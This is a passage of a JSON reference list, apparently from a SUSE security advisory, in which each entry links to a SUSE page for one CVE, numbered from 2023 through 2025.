"summary": "SUSE CVE CVE-2023-54303 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54303/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54304 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54304/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54309 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54309/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54312 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54313 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54313/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54314 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54314/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54315 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54315/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54316 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54316/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54318 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54318/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54319 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54319/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54322 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54324 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54326 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54326/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-26944 page",
"url": "https://www.suse.com/security/cve/CVE-2024-26944/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-27005 page",
"url": "https://www.suse.com/security/cve/CVE-2024-27005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-42103 page",
"url": "https://www.suse.com/security/cve/CVE-2024-42103/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53070 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53093 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53149 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22047 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22047/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37861 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37861/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38321 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38321/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39748 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39748/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39890 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39890/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39964 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39964/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39977 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40006 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40024 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40024/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40033 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40033/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40042 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40042/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40053 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40053/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40102 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40102/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40103 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40103/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40134 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40134/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40153 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40153/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40158 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40158/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40160 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40160/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40167 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40167/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40170 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40170/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40179 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40179/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40187 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40187/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40190 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40192 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40192/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40202 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40202/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40211 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40211/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40215 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40219 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40220 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40223 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40223/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40231 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40231/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40233 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40233/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40240 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40240/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40242 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40242/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40244 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40244/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40248 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40248/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40250 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40250/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40251 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40251/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40252 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40252/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40262 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40262/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40263 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40263/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40268 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40268/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40269 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40269/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40271 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40271/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40272 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40272/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40273 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40273/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40274 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40274/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40275 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40275/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40277 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40277/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40278 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40278/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40279 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40279/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40280 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40280/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40282 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40282/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40283 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40283/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40287/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40288 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40288/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40289 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40292 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40292/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40293 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40304 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40304/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40306 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40306/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40307 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40307/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40308 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40308/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40309 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40309/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40310 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40311 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40311/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40314 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40314/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40315 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40315/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40316 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40316/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40317 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40317/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40318 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40318/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40319 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40319/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40321 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40321/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40323 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40323/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40329 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40329/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40331 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40331/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40338 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40338/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40339 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40339/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40342 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40342/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40343 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40343/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40355 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40355/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40360 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40360/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68168 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68168/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68172 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68172/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68176 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68176/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68180 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68180/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68183 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68183/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68185 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68185/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68190 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68190/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68192 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68192/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68194 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68194/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68195 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68195/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68201 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68201/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68204 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68206 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68206/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68208 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68208/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68209 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68217 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68217/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68218 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68218/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68222 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68222/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68230 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68230/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68233 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68233/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68235 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68235/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68237 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68237/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68239 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68239/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68244 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68244/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68249 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68249/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68252 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68252/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68255 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68255/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68283 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68283/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68286 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68286/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68287/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68289 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68290 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68290/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68295 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68295/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68303 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68303/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68305 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68305/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68307 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68307/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68308 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68308/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68313 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68313/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68327 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68327/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68330 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68330/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68331 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68331/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68332 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68332/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68335 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68335/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68339 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68339/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68340 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68340/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68345 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68345/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68346 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68346/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68347 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68347/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68351 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68351/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68354 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68354/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68362 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68362/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68365 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68365/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68374 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68374/"
},
{
"category": "self",
